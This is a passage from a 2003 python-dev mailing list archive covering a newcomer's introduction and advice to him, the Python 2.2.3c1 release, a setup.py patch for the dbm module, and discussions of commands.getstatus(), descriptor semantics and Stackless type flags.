I would love to be able to help with Python-dev in some way. I'm
especially interested in issues directly related to the interpreter
itself.  I have gained some compiler development experience while at the
university and would love to continue working in this area.

If anyone has any thoughts or suggestions on how best I could proceed in
this direction, I would love to hear them.

Thanks !

Jeff Roberts


From tismer@tismer.com  Thu May 22 03:25:48 2003
From: tismer@tismer.com (Christian Tismer)
Date: Thu, 22 May 2003 04:25:48 +0200
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
References: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
Message-ID: <3ECC352C.5060307@tismer.com>

Jeffery Roberts wrote:

> Hello all !
> 
> I'm new to the list and thought I would quickly introduce myself. My name
> is Jeff and I am a university student [4th year] living in Toronto.
> 
> I would love to be able to help with Python-dev in some way. I'm
> especially interested in issues directly related to the interpreter
> itself.  I have gained some compiler development experience while at the
> university and would love to continue working in this area.
> 
> If anyone has any thoughts or suggestions on how best I could proceed in
> this direction, I would love to hear them.

All I can say is: Get involved with PyPy!
There is nothing harder, Python related stuff that I know of.
It can of course do some damage to your brain. I know what
I'm talking about.
Google for pypy and you got it.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From tim.one@comcast.net  Thu May 22 04:11:51 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 21 May 2003 23:11:51 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>

[Jeffery Roberts]
> I'm new to the list and thought I would quickly introduce myself. My
> name is Jeff and I am a university student [4th year] living in
> Toronto.
>
> I would love to be able to help with Python-dev in some way. I'm
> especially interested in issues directly related to the interpreter
> itself.  I have gained some compiler development experience while at
> the university and would love to continue working in this area.
>
> If anyone has any thoughts or suggestions on how best I could proceed
> in this direction, I would love to hear them.

As Christian said, you should enjoy pypy (an ambitious new project).  Less
ambitious is a rewrite of the front end, currently in progress on the
ast-branch branch of the Python CVS repository.  If you'd like to get your
feet wet first, there's always a backlog of Python bug and patch reports on
SourceForge begging for attention.  Check out

    http://www.python.org/dev/

for orientation, and leave your spare time at the door <wink>.



From martin@v.loewis.de  Thu May 22 08:10:12 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 22 May 2003 09:10:12 +0200
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
References: <Pine.LNX.4.55.0305212119400.21497@seawolf.cdf>
Message-ID: <m3znlf78yz.fsf@mira.informatik.hu-berlin.de>

Jeffery Roberts <g9robjef@cdf.toronto.edu> writes:

> I would love to be able to help with Python-dev in some way. I'm
> especially interested in issues directly related to the interpreter
> itself.  I have gained some compiler development experience while at the
> university and would love to continue working in this area.

In addition to what Christian suggested, the most valuable short-term
contribution would be to look into open bug reports, and propose fixes
for them. In particular, the Parser/Compiler, and "Python Interpreter
Core" bug categories might attract you (there are 4 bugs in the
former, and about 40 in the latter category). Many of these issues are
still open because they are really tricky, so expect some of these to
be middle-sized projects on their own.

Regards,
Martin



From fdrake@acm.org  Thu May 22 15:09:25 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 22 May 2003 10:09:25 -0400
Subject: [Python-Dev] Preparing docs for Python 2.2.3
Message-ID: <16076.55829.218985.714016@grendel.zope.com>

I'll be preparing the Python docs for the 2.2.3 release today.  If
there are any fixes for 2.2.3 that absolutely *must* go in, we need to
get them in over the next four hours.

I don't expect to have any sort of Internet access from Friday
(tomorrow) through next Tuesday, so the docs really need to be
finished today.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From barry@python.org  Thu May 22 15:23:56 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 10:23:56 -0400
Subject: [Python-Dev] Python 2.2.3
Message-ID: <1053613436.816.3.camel@barry>

We're going to put together Python 2.2.3 for release today.  Plan on a
check-in freeze starting at 3pm EDT.  If you have stuff you need to get
in, do it now, but please be conservative.

-Barry




From barry@python.org  Thu May 22 16:03:32 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 11:03:32 -0400
Subject: [Python-Dev] Re: Python 2.2.3
In-Reply-To: <1053613436.816.3.camel@barry>
References: <1053613436.816.3.camel@barry>
Message-ID: <1053615812.816.26.camel@barry>

On Thu, 2003-05-22 at 10:23, Barry Warsaw wrote:
> We're going to put together Python 2.2.3 for release today.  Plan on a
> check-in freeze starting at 3pm EDT.  If you have stuff you need to get
> in, do it now, but please be conservative.

Let me clarify.  After Pylab discussions, we've decided we're going to
make this 2.2.3c1 (release candidate 1).  It's important that folks with
commercial (and other) interest in a solid 2.2.3 release have time to
test it, so we'll do the final 2.2.3 release next week.

-Barry




From skip@pobox.com  Thu May 22 17:35:47 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 22 May 2003 11:35:47 -0500
Subject: [Python-Dev] Of what use is commands.getstatus()
Message-ID: <16076.64611.579396.832520@montanaro.dyndns.org>

I was reading the docs for the commands module and noticed getstatus() seems
to be completely unrelated to getstatusoutput() and getoutput().  I thought,
"I'll correct the docs.  They must be wrong."  Then I looked at commands.py
and saw the docs are correct.  It's the function definition which is weird.
Of what use is it to return 'ls -ld file'?  Based on its name I would have
guessed its function was

    def getoutput(cmd):
        """Return status of executing cmd in a shell."""
        return getstatusoutput(cmd)[0]

This particular function dates from 1990, so it clearly can't just be
deleted, but it seems completely superfluous to me, especially given the
existence of os.stat, os.listdir, etc.  Should it be deprecated or modified
to do (what I think is) the obvious thing?

Skip


From barry@python.org  Thu May 22 17:43:21 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 12:43:21 -0400
Subject: [Python-Dev] Python 2.2.3 setup.py patch for RH9 (redux)
Message-ID: <1053621801.816.45.camel@barry>

--=-GNmTfOCl3Eqs11XlSBK0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Back here:

http://mail.python.org/pipermail/python-dev/2003-April/035120.html

I mentioned a failure with dbm module on RedHat 9 which does not fail
for RedHat 7.3.  Here's I think a slightly better patch that I'd like to
commit.  Anybody else who's doing testing on other systems, could you
please try this out and let me know if it causes any problems?

Thanks,
-Barry


--=-GNmTfOCl3Eqs11XlSBK0
Content-Disposition: attachment; filename=setup.py-patch
Content-Type: text/x-patch; name=setup.py-patch; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit

Index: setup.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/setup.py,v
retrieving revision 1.73.4.18
diff -u -r1.73.4.18 setup.py
--- setup.py	18 May 2003 13:42:58 -0000	1.73.4.18
+++ setup.py	22 May 2003 16:39:08 -0000
@@ -406,6 +406,9 @@
             elif self.compiler.find_library_file(lib_dirs, 'db1'):
                 exts.append( Extension('dbm', ['dbmmodule.c'],
                                        libraries = ['db1'] ) )
+            elif self.compiler.find_library_file(lib_dirs, 'gdbm'):
+                exts.append( Extension('dbm', ['dbmmodule.c'],
+                                       libraries = ['gdbm'] ) )
             else:
                 exts.append( Extension('dbm', ['dbmmodule.c']) )
 

--=-GNmTfOCl3Eqs11XlSBK0--



From barry@python.org  Thu May 22 17:56:02 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 12:56:02 -0400
Subject: [Python-Dev] One other 2.2.3 failure
Message-ID: <1053622561.816.51.camel@barry>

The only other test suite failure I see for Python 2.2.3 is in
test_linuxaudiodev.py.  But since this fails for me in Python 2.3cvs
too, I'm included to chalk that up to not having audio set up correctly
on my boxes.

What say ye who haveth a working audio on Linux?

-Barry




From barry@python.org  Thu May 22 17:57:25 2003
From: barry@python.org (Barry Warsaw)
Date: 22 May 2003 12:57:25 -0400
Subject: [Python-Dev] Python 2.2.3 setup.py patch for RH9 (redux)
In-Reply-To: <1053621801.816.45.camel@barry>
References: <1053621801.816.45.camel@barry>
Message-ID: <1053622645.816.53.camel@barry>

On Thu, 2003-05-22 at 12:43, Barry Warsaw wrote:
> Back here:
> 
> http://mail.python.org/pipermail/python-dev/2003-April/035120.html
> 
> I mentioned a failure with dbm module on RedHat 9 which does not fail
> for RedHat 7.3.  Here's I think a slightly better patch that I'd like to
> commit.  Anybody else who's doing testing on other systems, could you
> please try this out and let me know if it causes any problems?

I see no regressions for RedHat 7.3 so I'm feeling optimistic about this
patch <wink>.

-Barry




From skip@pobox.com  Thu May 22 18:30:18 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 22 May 2003 12:30:18 -0500
Subject: [Python-Dev] Python 2.2.3 setup.py patch for RH9 (redux)
In-Reply-To: <1053621801.816.45.camel@barry>
References: <1053621801.816.45.camel@barry>
Message-ID: <16077.2346.379038.567216@montanaro.dyndns.org>

    Barry> I mentioned a failure with dbm module on RedHat 9 which does not
    Barry> fail for RedHat 7.3.  Here's I think a slightly better patch that
    Barry> I'd like to commit.  Anybody else who's doing testing on other
    Barry> systems, could you please try this out and let me know if it
    Barry> causes any problems?

Works for me on Mac OS X.  Of course, it doesn't actually link with gdbm, so
plot a very small data point on your graph.  ;-)

Skip


From g9robjef@cdf.toronto.edu  Thu May 22 21:56:51 2003
From: g9robjef@cdf.toronto.edu (Jeffery Roberts)
Date: Thu, 22 May 2003 16:56:51 -0400 (EDT)
Subject: [Python-Dev] Introduction
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>
Message-ID: <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>

Thanks for all of your replies.  The front-end rewrite sounds especially
interesting. I'm going to look into that.  Is the entire front end
changing (ie scan/parse/ast) or just the AST structure ?

If you have any more information or directions please let me know.

Jeff

On Wed, 21 May 2003, Tim Peters wrote:

> [Jeffery Roberts]
> > I'm new to the list and thought I would quickly introduce myself. My
> > name is Jeff and I am a university student [4th year] living in
> > Toronto.
> >
> > I would love to be able to help with Python-dev in some way. I'm
> > especially interested in issues directly related to the interpreter
> > itself.  I have gained some compiler development experience while at
> > the university and would love to continue working in this area.
> >
> > If anyone has any thoughts or suggestions on how best I could proceed
> > in this direction, I would love to hear them.
>
> As Christian said, you should enjoy pypy (an ambitious new project).  Less
> ambitious is a rewrite of the front end, currently in progress on the
> ast-branch branch of the Python CVS repository.  If you'd like to get your
> feet wet first, there's always a backlog of Python bug and patch reports on
> SourceForge begging for attention.  Check out
>
>     http://www.python.org/dev/
>
> for orientation, and leave your spare time at the door <wink>.
>
>


From drifty@alum.berkeley.edu  Thu May 22 21:29:20 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Thu, 22 May 2003 13:29:20 -0700
Subject: [Python-Dev] Introduction
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHMEOGFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHMEOGFLAA.tim@zope.com>
Message-ID: <3ECD3320.8030605@ocf.berkeley.edu>

Tim Peters wrote:
>>I moved over to Mozilla Mail and I keep hitting "Reply" when I mean to
>>hit "Reply All".  Sorry about  that.
> 
> 
> Oh, it doesn't bother me a bit, Brett!  I'm more concerned that your
> response would have been helpful to the OP, and he didn't get to see it.
> 

Well, lets find out!  Here is my email that was meant to go to the list 
pasted below.

Tim Peters wrote:

 > [Jeffery Roberts]
 >
<snip>

 >> I would love to be able to help with Python-dev in some way. I'm
 >> especially interested in issues directly related to the interpreter
 >> itself.  I have gained some compiler development experience while at
 >> the university and would love to continue working in this area.
 >>
 >> If anyone has any thoughts or suggestions on how best I could proceed
 >> in this direction, I would love to hear them.
 >
 >
 >  If you'd like to get your
 > feet wet first, there's always a backlog of Python bug and patch 
reports on
 > SourceForge begging for attention.


I know I learned a lot from working on patches and bugs.  It especially 
helps if you jump in on a patch that is being actively worked on and can 
ask how something works.  Otherwise just read the source until your eyes 
  bleed and curse anyone who doesn't write extensive documentation for 
code.  =)

There also has been mention of the AST branch.  I know I plan on working 
on that after I finish going through the bug and patch backlog.  Only 
trouble is that the guys who actually fully understand it (Jeremy, Tim, 
and Neal) are rather busy so it is going to be a "jump in the pool and 
drown and hope your flailing manages to at least generate something 
useful but you die and come back in another life wiser and able to 
attempt again until you stop drowning and manage to only get sick from 
gulping down so much chlorinated water".  =)

 >  Check out
 >
 >     http://www.python.org/dev/
 >
 > for orientation, and leave your spare time at the door <wink>.
 >

I will vouch for the loss of spare time.  This has become a job.  Best 
job ever, though.  =)

The only big piece of advice I can offer is to just make sure you are 
nice and cordial on the list; there is a low tolerance for jerks here. 
Don't take this as meaning to not take a stand on an issue!  All I am 
saying is realize that email  does not transcribe humor perfectly and 
until the list gets used to your personal writing style you  might have 
to just make sure  what you write does not come off as insulting.

-Brett



From drifty@alum.berkeley.edu  Fri May 23 04:21:20 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Thu, 22 May 2003 20:21:20 -0700
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
References: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net> <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
Message-ID: <3ECD93B0.5060704@ocf.berkeley.edu>

Jeffery Roberts wrote:
> Thanks for all of your replies.  The front-end rewrite sounds especially
> interesting. I'm going to look into that.  Is the entire front end
> changing (ie scan/parse/ast) or just the AST structure ?
> 
> If you have any more information or directions please let me know.
> 

It is just a new AST.  Redoing/replacing pgen is something else 
entirely.  =)

The branch that this is being developed under in CVS is ast-branch. 
There is a incomplete README in Python/compile.txt that explains the 
basic idea and direction.

-Brett



From barry@python.org  Fri May 23 04:30:45 2003
From: barry@python.org (Barry Warsaw)
Date: Thu, 22 May 2003 23:30:45 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3c1
Message-ID: <F057EE6A-8CCE-11D7-A2F3-003065EEFAC8@python.org>

I'm happy to announce the release of Python 2.2.3c1 (release candidate 
1).  This is a bug fix release for the stable Python 2.2 code line.  
Barring any critical issues, we expect to release Python 2.2.3 final by 
this time next week.  We encourage those with an interest in a solid 
2.2.3 release to download this candidate and test it on their code.

The new release is available here:

	http://www.python.org/2.2.3/

Python 2.2.3 has a large number of bug fixes and memory leak patches.  
For full details, see the release notes at

	http://www.python.org/2.2.3/NEWS.txt

There are a small number of minor incompatibilities with Python 2.2.2; 
for details see:

	http://www.python.org/2.2.3/bugs.html

Perhaps the most important is that the Bastion.py and rexec.py modules 
have been disabled, since we do not deem them to be safe.

As usual, a Windows installer and a Unix/Linux source tarball are made 
available, as well as tarballs of the documentation in various forms. 
At the moment, no Mac version or Linux RPMs are available, although I 
expect them to appear soon after 2.2.3 final is released.

On behalf of Guido, I'd like to thank everyone who contributed to this 
release, and who continue to ensure Python's success.

Enjoy,
-Barry



From Jack.Jansen@cwi.nl  Fri May 23 12:42:20 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Fri, 23 May 2003 13:42:20 +0200
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <F057EE6A-8CCE-11D7-A2F3-003065EEFAC8@python.org>
Message-ID: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>

On Friday, May 23, 2003, at 05:30 Europe/Amsterdam, Barry Warsaw wrote:

> I'm happy to announce the release of Python 2.2.3c1 (release candidate 
> 1).

Oops, that suddenly went *very* fast, I though I had until the 
weekend...

Is there a chance I could get #723495 still in before 2.2.3 final? I 
was also hoping to find a fix for #571343, but I don't have a patch yet 
(although I'll try to get one up in the next few hours).
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From guido@python.org  Fri May 23 14:11:35 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 23 May 2003 09:11:35 -0400
Subject: [Python-Dev] Of what use is commands.getstatus()
In-Reply-To: "Your message of Thu, 22 May 2003 11:35:47 CDT."
 <16076.64611.579396.832520@montanaro.dyndns.org>
References: <16076.64611.579396.832520@montanaro.dyndns.org>
Message-ID: <200305231311.h4NDBZ725779@pcp02138704pcs.reston01.va.comcast.net>

> I was reading the docs for the commands module and noticed getstatus() seems
> to be completely unrelated to getstatusoutput() and getoutput().  I thought,
> "I'll correct the docs.  They must be wrong."  Then I looked at commands.py
> and saw the docs are correct.  It's the function definition which is weird.
> Of what use is it to return 'ls -ld file'?  Based on its name I would have
> guessed its function was
> 
>     def getoutput(cmd):
>         """Return status of executing cmd in a shell."""
>         return getstatusoutput(cmd)[0]
> 
> This particular function dates from 1990, so it clearly can't just be
> deleted, but it seems completely superfluous to me, especially given the
> existence of os.stat, os.listdir, etc.  Should it be deprecated or modified
> to do (what I think is) the obvious thing?

That whole module wasn't thought out very well.  I recently tried to
use it and found that the strip of the trailing \n on getoutput() is
also a counterproductive feature.  I suggest that someone should
design a replacement, perhaps to live in shutil, and then we can
deprecate it.  Until then I would leave it alone.  Certainly don't
"fix" it by doing something incompatible.

--Guido van Rossum (home page: http://www.python.org/~guido/)



From guido@python.org  Fri May 23 15:06:05 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 23 May 2003 10:06:05 -0400
Subject: [Python-Dev] Descriptor API
In-Reply-To: "Your message of Wed, 21 May 2003 01:41:16 BST."
 <000501c31f31$b0c820b0$f3100dd5@violante>
References: <000501c31f31$b0c820b0$f3100dd5@violante>
Message-ID: <200305231406.h4NE65T26180@pcp02138704pcs.reston01.va.comcast.net>

> I was doing some tricks with metaclasses and descriptors in Python 2.2 and
> stumbled on the following:
> 
> >>> class test(object):
> ...     a = property(lambda: 1)
> ...
> >>> print test.a
> <property object at 0x01504D20>
> >>> print test.a.__set__
> <method-wrapper object at 0x01517220>
> >>> print test.a.fset
> None
> 
> What this means in practice, is that if I want to test if a
> descriptor is read-only I have to have two tests: One for custom
> descriptors, checking that getting __set__ does not barf and another
> for property, checking that fset returns None.

Why are you interested in knowing whether a descriptor is read-only?

> So, why doesn't getting __set__  raise AttributeError in the above case?

This is a feature.  The presence of __set__ (even if it always raises
AttributeError when *called*) signals this as a "data descriptor".
The difference between data descriptors and others is that a data
descriptor can not be overridden by putting something in the instance
dict; a non-data descriptor can be overridden by assignment to an
instance attribute, which will store a value in the instance dict.

For example, a method is a non-data descriptor (and the prevailing
example of such).  This means that the following example works:

  class C(object):
      def meth(self): return 42

  x = C()
  x.meth()  # prints 42
  x.meth = lambda: 24
  x.meth()  # prints 24

> Is this a bug? If it's not, it sure is a (minor) feature request
> from my part :-)

Because of the above explanation, the request cannot be granted.

You can test the property's fset attribute however to tell whether a
'set' argument was passed to the constructor.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From op73418@mail.telepac.pt  Fri May 23 15:34:14 2003
From: op73418@mail.telepac.pt (=?iso-8859-1?Q?Gon=E7alo_Rodrigues?=)
Date: Fri, 23 May 2003 15:34:14 +0100
Subject: [Python-Dev] Descriptor API
References: <000501c31f31$b0c820b0$f3100dd5@violante> <200305231406.h4NE65T26180@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <001a01c32138$625c09b0$0d40c151@violante>

----- Original Message -----
From: "Guido van Rossum" <guido@python.org>
To: "Gonçalo Rodrigues" <op73418@mail.telepac.pt>
Cc: <python-dev@python.org>
Sent: Friday, May 23, 2003 3:06 PM
Subject: Re: [Python-Dev] Descriptor API


> > I was doing some tricks with metaclasses and descriptors in Python 2.2
and
> > stumbled on the following:
> >
> > >>> class test(object):
> > ...     a = property(lambda: 1)
> > ...
> > >>> print test.a
> > <property object at 0x01504D20>
> > >>> print test.a.__set__
> > <method-wrapper object at 0x01517220>
> > >>> print test.a.fset
> > None
> >
> > What this means in practice, is that if I want to test if a
> > descriptor is read-only I have to have two tests: One for custom
> > descriptors, checking that getting __set__ does not barf and another
> > for property, checking that fset returns None.
>
> Why are you interested in knowing whether a descriptor is read-only?
>

Introspection dealing with a metaclass that injected methods in its
instances depending on a descriptor. In other words, having fun with
Python's wacky tricks.

> > So, why doesn't getting __set__  raise AttributeError in the above case?
>
> This is a feature.  The presence of __set__ (even if it always raises
> AttributeError when *called*) signals this as a "data descriptor".
> The difference between data descriptors and others is that a data
> descriptor can not be overridden by putting something in the instance
> dict; a non-data descriptor can be overridden by assignment to an
> instance attribute, which will store a value in the instance dict.
>
> For example, a method is a non-data descriptor (and the prevailing
> example of such).  This means that the following example works:
>
>   class C(object):
>       def meth(self): return 42
>
>   x = C()
>   x.meth()  # prints 42
>   x.meth = lambda: 24
>   x.meth()  # prints 24
>
> > Is this a bug? If it's not, it sure is a (minor) feature request
> > from my part :-)
>
> Because of the above explanation, the request cannot be granted.
>

Thanks for the reply (and also to P. Eby, btw). I was way off track when I
sent the email, because it did not occured to me that property was a type
implementing __get__ and __set__. With this piece of info connecting the
dots the idea is just plain foolish.

> You can test the property's fset attribute however to tell whether a
> 'set' argument was passed to the constructor.
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)

With my best regards,
G. Rodrigues



From guido@python.org  Fri May 23 15:39:10 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 23 May 2003 10:39:10 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Wed, 21 May 2003 02:50:40 +0200."
 <3ECACD60.10503@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
 <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
 <3ECA3DCB.50306@tismer.com>
 <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
 <3ECACD60.10503@tismer.com>
Message-ID: <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>

> > The other is the new style where the PyMethodDef
> > array is in tp_methods, and is scanned once by PyType_Ready.
> 
> Right, again. Now, under the hopeful assumption that every
> sensible extension module that has some types to publish also
> does this through its module dictionary, I would have the
> opportunity to cause PyType_Ready being called early enough
> to modify the method table, before any of its methods is used
> at all.

Dangerous assumption!  It's not inconceivable that a class would
instantiate some of its own classes as part of its module
initialization.

> > 3rd party modules that have been around for a while are likely to use
> > Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
> > store the pointer to the converted table, so it may be better to
> > simply check your bit in the first array element and then cast to a
> > PyMethodDef or a PyMethodDefEx array based on what the bit says (you
> > can safely assume that all elements of an array are the same size :-).
> 
> Hee hee, yeah. Of course, if there isn't a reliable way to
> intercept method table access before the first Py_FindMethod
> call, I could of course modify Py_FindMethod. For instance,
> a modified, new-style method table might be required to always
> start with a dummy entry, where the flags word is completely
> -1, to signal having been converted to new-style.

Why so drastic?  You could just set a reserved bit.f

> ...
> 
> >>If that approach is trustworthy, I also could drop
> >>the request for these 8 bits.
> > 
> > Sure.  Ah, a bit in the type would work just as well, and
> > Py_FindMethod *does* have access to the type.
> 
> You think of the definition in methodobject.c, as it is
> 
> """
> /* Find a method in a single method list */
> 
> PyObject *
> Py_FindMethod(PyMethodDef *methods, PyObject *self, char *name)
> """
> 
> , assuming that self always is not NULL, but representing a valid
> object with a type, and this type is already referring to the
> methods table?

Right.  There is already code that uses self->ob_type in
Py_FindMethodInChain(), which is called by Py_FindMethod().

> Except for module objects, this seems to be right. I've run
> Python against a lot of Python modules, but none seems
> to call Py_FindMethod with a self parameter of NULL.

I don't think it would be safe to do so.

> If that is true, then I can patch a small couple of
> C functions to check for the new bit, and if it's not
> there, re-create the method table in place.
> This is music to me ears. But...
> 
> Well, there is a drawback:
> I *do* need two bits, and I hope you will allow me to add this
> second bit, as well.
> 
> The one, first bit, tells me if the source has been compiled
> with Stackless and its extension stuff. Nullo problemo.
> I can then in-place modify the method table in a compatible
> way, or leave it as it is, bny default.
> But then, this isn't sufficient to set this bit then, like an
> "everything is fine, now" relief. This is so, since this is *still*
> an old module, and while its type's method tables have been
> patched, the type is still not augmented by new slots, like
> the new tp_call_nr slots (and maybe a bazillion to come, soon).
> The drawback is, that I cannot simply replace the whole type
> object, since type objects are not represented as object
> pointers (like they are now, most of the time, in the dynamic
> heaptype case), but they are constant struct addresses, where
> the old C module might be referring to.
> 
> So, what I think to need is no longer 9 bits, but two of them:
> One that says "everything great from the beginning", and another
> one that says "well, ok so far, but this is still an old object".
> 
> I do think this is the complete story, now.
> Instead of requiring nine bits, I'm asking for two.
> But this is just *your options; I also can live with one bit,
> but then I have to add a special, invalid method table entry
> that just serves for this purpose.
> In order to keep my souce code hack to the minimum, I'd really
> like to ask for the two bits in the typeobject flags.

OK, two bits you shall have.  Don't spend them all at once!

> Thanks so much for being so supportive -- chris

Anything to keep ctual stackless support out of the core. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Fri May 23 15:55:51 2003
From: barry@python.org (Barry Warsaw)
Date: Fri, 23 May 2003 10:55:51 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
Message-ID: <3ECE3677.1030500@python.org>

Jack Jansen wrote:
> 
> Oops, that suddenly went *very* fast, I though I had until the weekend...

But probably not as fast as it should have.  I had fun reading checkin 
comments like (paraphrasing), "this change is probably important enough 
for a 2.2.3 release" dated from December of last year. :)

> Is there a chance I could get #723495 still in before 2.2.3 final? I was 
> also hoping to find a fix for #571343, but I don't have a patch yet 
> (although I'll try to get one up in the next few hours).

I think it would be fine to get these into 2.2.3 final.

-Barry




From theller@python.net  Fri May 23 16:31:06 2003
From: theller@python.net (Thomas Heller)
Date: 23 May 2003 17:31:06 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
 <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
 <3ECA3DCB.50306@tismer.com>
 <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
 <3ECACD60.10503@tismer.com>
 <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <k7chn0hx.fsf@python.net>

> > > The other is the new style where the PyMethodDef
> > > array is in tp_methods, and is scanned once by PyType_Ready.
> > 
> > Right, again. Now, under the hopeful assumption that every
> > sensible extension module that has some types to publish also
> > does this through its module dictionary, I would have the
> > opportunity to cause PyType_Ready being called early enough
> > to modify the method table, before any of its methods is used
> > at all.
> 
> Dangerous assumption!  It's not inconceivable that a class would
> instantiate some of its own classes as part of its module
> initialization.

I do not really know what you are talking about here, but that
assumption is violated by the ctypes module.
It has a number of metaclasses implemented in C, neither of them
is exposed in the module dictionary, and there *have been* types which
were not exposed, because they are only used internally.

Thomas



From jeremy@ZOPE.COM  Fri May 23 17:23:43 2003
From: jeremy@ZOPE.COM (Jeremy Hylton)
Date: 23 May 2003 12:23:43 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
References: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>
 <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
Message-ID: <1053707023.28095.3.camel@slothrop.zope.com>

On Thu, 2003-05-22 at 16:56, Jeffery Roberts wrote:
> Thanks for all of your replies.  The front-end rewrite sounds especially
> interesting. I'm going to look into that.  Is the entire front end
> changing (ie scan/parse/ast) or just the AST structure ?
> 
> If you have any more information or directions please let me know.

The current plan is to create an AST and replace the bytecode compiler. 
We're leaving a rewrite of the parser for a later project.  It's a
fairly big project; large parts of it are done, but there is work
remaining to do in nearly every part -- the concrete-to-abstract
translator, error checking, compilation to byte-code.

At the moment, it's possible to start an interactive interpreter session
and see what works.  But it isn't possible to compile and run all of
site.py and everything it imports.

Jeremy




From logistix@cathoderaymission.net  Fri May 23 20:44:19 2003
From: logistix@cathoderaymission.net (logistix)
Date: Fri, 23 May 2003 14:44:19 -0500 (CDT)
Subject: [Python-Dev] Introduction
In-Reply-To: <1053707023.28095.3.camel@slothrop.zope.com>
Message-ID: <Pine.LNX.4.44.0305231443070.8377-100000@oblivion.cathoderaymission.net>

On 23 May 2003, Jeremy Hylton wrote:

> On Thu, 2003-05-22 at 16:56, Jeffery Roberts wrote:
> > Thanks for all of your replies.  The front-end rewrite sounds especially
> > interesting. I'm going to look into that.  Is the entire front end
> > changing (ie scan/parse/ast) or just the AST structure ?
> > 
> > If you have any more information or directions please let me know.
> 
> The current plan is to create an AST and replace the bytecode compiler. 
> We're leaving a rewrite of the parser for a later project.  It's a
> fairly big project; large parts of it are done, but there is work
> remaining to do in nearly every part -- the concrete-to-abstract
> translator, error checking, compilation to byte-code.
> 
> At the moment, it's possible to start an interactive interpreter session
> and see what works.  But it isn't possible to compile and run all of
> site.py and everything it imports.
> 
